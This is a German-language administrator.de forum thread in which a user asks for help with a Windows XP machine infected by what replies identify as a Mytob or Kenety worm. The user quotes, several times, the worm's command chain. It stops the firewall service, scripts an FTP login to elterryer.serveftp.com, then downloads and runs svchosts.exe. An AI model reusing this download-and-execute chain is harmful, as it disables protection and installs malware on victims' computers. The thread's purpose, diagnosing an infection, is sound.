Automatischer start einer FTP Verbindung um ba.exe herunter zu laden
Virus Trojaner????
Hallo zusammen,
seit kurzem habe ich auf einem Rechner seltsame Probleme. Der Rechner ist mit Windows XP SP2 ausgestattet und die aktuellsten SP's und Patches sind drauf. Auf dem Rechner läuft Antivr als Virenscanner.
Nun startet sich immer wieder im Hintergrund eine Datei und ruft mir folgenden Befehl auf:
"c:\windows\system32\cmd32.exe -ftp -n -v -s:iJ"
Command-Fenster ist offen und der angezeigte Text lautet:
C:\Windows\system32>cmd /c net stop SharedAccess &echo open elterryer.serveftp.com 21 >> iJ &echo user roko syfredi >> iJ & echo binary >> ij &echo get svchosts.exe >> ij &echo by >> ij &ftp -n -v -s:ij &del ij &svchosts.exe &net start SharedAccess &exit
Danach kommt die Meldung dass die Gemeinsame Nutzung der Internetverbindung erfolgreich beendet wurde. allerdings ist dann ftp geöffnet mit folgenden Werten:
ftp> open 83.239.179.74 64928
ftp> user t g
ftp get ba.exe
Ich kann ja noch ungefähr nachvollziehen was er da alles macht, aber kann die verdammte Datei die den schrott ausführt nicht lokalisieren.
Falls Ihr eine Idee habt, wäre ich euch sehr dankbar.
Grüße
Martin
P.S. Stinger, Adaware, Antivir mehrfach darüberlaufen gelassen, da dies aber normale Befehle sind haben die tools nichts gefunden.
Registry und system.ini sowie win.ini überprüft.
Hallo zusammen,
seit kurzem habe ich auf einem Rechner seltsame Probleme. Der Rechner ist mit Windows XP SP2 ausgestattet und die aktuellsten SP's und Patches sind drauf. Auf dem Rechner läuft Antivr als Virenscanner.
Nun startet sich immer wieder im Hintergrund eine Datei und ruft mir folgenden Befehl auf:
"c:\windows\system32\cmd32.exe -ftp -n -v -s:iJ"
Command-Fenster ist offen und der angezeigte Text lautet:
C:\Windows\system32>cmd /c net stop SharedAccess &echo open elterryer.serveftp.com 21 >> iJ &echo user roko syfredi >> iJ & echo binary >> ij &echo get svchosts.exe >> ij &echo by >> ij &ftp -n -v -s:ij &del ij &svchosts.exe &net start SharedAccess &exit
Danach kommt die Meldung dass die Gemeinsame Nutzung der Internetverbindung erfolgreich beendet wurde. allerdings ist dann ftp geöffnet mit folgenden Werten:
ftp> open 83.239.179.74 64928
ftp> user t g
ftp get ba.exe
Ich kann ja noch ungefähr nachvollziehen was er da alles macht, aber kann die verdammte Datei die den schrott ausführt nicht lokalisieren.
Falls Ihr eine Idee habt, wäre ich euch sehr dankbar.
Grüße
Martin
P.S. Stinger, Adaware, Antivir mehrfach darüberlaufen gelassen, da dies aber normale Befehle sind haben die tools nichts gefunden.
Registry und system.ini sowie win.ini überprüft.
Bitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 55135
Url: https://administrator.de/forum/automatischer-start-einer-ftp-verbindung-um-ba-exe-herunter-zu-laden-55135.html
Ausgedruckt am: 24.12.2024 um 13:12 Uhr
12 Kommentare
Neuester Kommentar
Wenn ich das noch richtig in Erinnerung habe, ist die ba.exe ein Tool, welches nach BIOS-Updates bei Mr. BIOS schaut. Siehe auch http://www.nickles.de/biosguide/html/11.php3 Hast du mal versucht, dein BIOS upzudaten ohne die Originalherstellerseite zu nutzen?
Die aufgerufene IP-Adresse jedenfalls gehört nach meinen Recherchen zu Mr. Bios ...
Die aufgerufene IP-Adresse jedenfalls gehört nach meinen Recherchen zu Mr. Bios ...
Aber dieser Teil ist definitiv nicht normal:
"c:\windows\system32\cmd32.exe -ftp -n
-v -s:iJ"
Command-Fenster ist offen und der angezeigte
Text lautet:
C:\Windows\system32>cmd /c net stop
SharedAccess &echo open
elterryer.serveftp.com 21 >> iJ
&echo user roko syfredi >> iJ &
echo binary >> ij &echo get
svchosts.exe >> ij &echo by
>> ij &ftp -n -v -s:ij &del ij
&svchosts.exe &net start SharedAccess
&exit
-v -s:iJ"
Command-Fenster ist offen und der angezeigte
Text lautet:
C:\Windows\system32>cmd /c net stop
SharedAccess &echo open
elterryer.serveftp.com 21 >> iJ
&echo user roko syfredi >> iJ &
echo binary >> ij &echo get
svchosts.exe >> ij &echo by
>> ij &ftp -n -v -s:ij &del ij
&svchosts.exe &net start SharedAccess
&exit
Hi,
habe gerade mal ausprobiert, was es mit dem FTP Server auf sich hat, der ist nicht mehr
existent. Der Hostname gehört zu einem Rechner, der per no-ip.com einen dynamischen DNS
Eintrag bekommt. Das Script dürfte also keine Dateien heruntergeladen haben.
Der Rechner ist über den Provider rima-tde.net - über den ich bisher noch nichts weiteres finden
konnte eingewählt.
Aber sicherheitshalber mach den Offlinescan trotzdem.
Gruß
cykes
habe gerade mal ausprobiert, was es mit dem FTP Server auf sich hat, der ist nicht mehr
existent. Der Hostname gehört zu einem Rechner, der per no-ip.com einen dynamischen DNS
Eintrag bekommt. Das Script dürfte also keine Dateien heruntergeladen haben.
Der Rechner ist über den Provider rima-tde.net - über den ich bisher noch nichts weiteres finden
konnte eingewählt.
Aber sicherheitshalber mach den Offlinescan trotzdem.
Gruß
cykes
Nun startet sich immer wieder im Hintergrund
eine Datei und ruft mir folgenden Befehl
auf:
"c:\windows\system32\cmd32.exe -ftp -n
-v -s:iJ"
Command-Fenster ist offen und der angezeigte
Text lautet:
C:\Windows\system32>cmd /c net stop
SharedAccess &echo open
elterryer.serveftp.com 21 >> iJ
&echo user roko syfredi >> iJ &
echo binary >> ij &echo get
svchosts.exe >> ij &echo by
>> ij &ftp -n -v -s:ij &del ij
&svchosts.exe &net start SharedAccess
&exit
Danach kommt die Meldung dass die Gemeinsame
Nutzung der Internetverbindung erfolgreich
beendet wurde. allerdings ist dann ftp
geöffnet mit folgenden Werten:
ftp> open 83.239.179.74 64928
ftp> user t g
ftp get ba.exe
In vorliegenden Fall wurde fruchtlos versucht, die Datei ba.exe herunterzuladen.
Bei der ba. exe handelt es sich um einen Wurm aus der W32/Mytob-Reihe.
Seltsamerweise ist in der Shellaktivitaet ein Verweis auf den Server elterryer.serveftp.com, was eigentlich auf einen anderen Wurm hinweist, den W32.Kenety, siehe weitere Informationen
Das wollte ich nur noch dazu loswerden, bevor ich den Thread auf geloest setze.
saludos
gnarff /el moderador